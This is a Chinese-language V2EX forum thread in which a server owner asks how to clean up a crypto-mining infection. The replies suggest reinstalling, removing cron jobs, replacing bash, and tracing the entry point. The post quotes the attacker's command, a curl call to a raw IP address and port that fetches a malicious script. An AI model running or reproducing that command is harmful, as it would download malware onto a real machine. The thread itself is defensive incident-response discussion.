V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
youngkingdom
V2EX  ›  服务器

服务器被植入挖矿病毒了,基于被挂马的脚本该怎么修复?

  •  
  •   youngkingdom · 2022-01-21 15:42:35 +08:00 · 1860 次点击
    这是一个创建于 797 天前的主题,其中的信息可能已经有所发展或是发生改变。

    今天阿里云告警被植入挖矿病毒了,上去检查了一番看见运行了 curl 从他的服务器上拉了一个脚本,求大佬帮助,基于脚本内容该怎么修复服务器?

    curl -fsSL http://192.210.200.66:1234/xmss
    
    6 条回复    2022-01-21 16:51:25 +08:00
    JDog
        1
    JDog  
       2022-01-21 15:51:37 +08:00
    不废话,直接重装
    mikeguan
        2
    mikeguan  
       2022-01-21 15:56:17 +08:00 via Android
    通过这个脚本又学习了

    把定时任务干掉,把任意命令执行的脚本删掉应该就差不多了。

    最关键的是找到从什么地方进来的,你给的脚本并不能反映你系统漏洞在哪
    youngkingdom
        3
    youngkingdom  
    OP
       2022-01-21 15:56:41 +08:00
    @JDog 服务太多了,重装成本过高😂。这是最后没有办法的办法了
    youngkingdom
        4
    youngkingdom  
    OP
       2022-01-21 15:59:19 +08:00
    @mikeguan 查看告警详情是通过 docker 启动的 java 服务,服务已经停了,已经在检查代码漏洞了。目前是想要解决服务器上的问题
    youngkingdom
        5
    youngkingdom  
    OP
       2022-01-21 16:32:32 +08:00
    已找到相关样本分析,https://www.52 坡姐.cn/thread-1540889-1-1.html
    gadfly3173
        6
    gadfly3173  
       2022-01-21 16:51:25 +08:00
    可以考虑先用 sftp 之类的方式把 bash 之类的关键程序都换成干净的,然后检查下全服务器上所有最新修改的文件(如果它的脚本不会去伪造修改时间的话)然后再去看看从哪进来的。如果它会改时间的话还是重装吧
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   3270 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 14:07 · PVG 22:07 · LAX 07:07 · JFK 10:07
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.